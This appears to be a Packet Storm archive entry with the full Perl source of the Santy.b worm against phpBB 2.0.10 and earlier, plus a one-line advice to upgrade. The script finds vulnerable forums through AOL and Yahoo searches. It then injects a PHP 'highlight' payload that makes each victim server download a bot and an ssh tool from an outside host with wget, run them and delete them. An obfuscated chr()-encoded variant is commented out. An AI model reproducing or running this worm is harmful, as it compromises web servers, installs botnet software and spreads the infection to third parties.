Santy.b phpBB worm that affects versions 2.0.10 and below and installs a bot. Uses AOL/Yahoo search.
f4c02459ecd6bf099c06b116417f8a3eSanty.b - phpBB <= 2.0.10 Bot Install (Using AOL/Yahoo Search)
Date : 25/12/2004
_Solution_ : Upgrade to phpBB version _2.0.11_ <http://www.phpbb.com/downloads.php>
#/usr/bin/perl
use IO::Socket;
use LWP::Simple;
@vul = "";
$a=0;
$numero = int rand(999);
$site = "search.aol.com";
$procura = "viewtopic.php%3Ft%3D$numero";
######################################
for($n=0;$n<90;$n += 10){
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next;
print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);
$ae = "@resu";
while ($ae=~ m/<a href=.*?>.*?<\/a>/){
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/;
$uber=$1;
if ($uber !~/translate/)
{if ($uber !~ /cache/)
{if ($uber !~ /"/)
{if ($uber !~ /google/)
{if ($uber !~ /216/)
{if ($uber =~/http/)
{if ($uber !~ /start=/)
{
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++;
}}}}}}}}}
##########################
for($cadenu=1;$cadenu <= 99; $cadenu +=10){
@cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=
1&b=$cadenu") or next;
$ae = "@cade";
while ($ae=~ m/<em class=yschurl>.*?<\/em>/){
$ae=~ s/<em class=yschurl>(.*?)<\/em>/$1/;
$uber=$1;
$uber =~ s/ //g;
$uber =~ s/<b>//g;
$uber =~ s/<\/b>//g;
$uber =~ s/<wbr>//g;
if ($uber =~/&/)
{
$nu = index $uber, '&';
$uber = substr($uber,0,$nu);
}
$vul[$a] = $uber;
$a++
}}
#########################
#$cmd = '&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)
%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%2
52echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252e
chr(46)%252echr(116)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr
(115)%252echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(98)%
252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252
echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr
(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)
%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252
echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr
(110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%252echr(115)
%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr'.'(99)%252echr(111)%25
2echr(109)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr
(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%25
2echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527';
$cmd = '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd /tmp;wget
server.org/pdf/bot;perl bot;wget server.org/pdf/ssh.a;perl ssh.a;rm -rf ssh.*;rm -rf bot*%3B%
20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72
%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5
D%29.%2527';
$b = scalar(@vul);
for($a=0;$a<=$b;$a++)
{
$sitevul = $vul[$a].$cmd;
if($sitevul !~/http/){ $sitevul = 'http://'.$sitevul; }
$res = get($sitevul) or next;
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!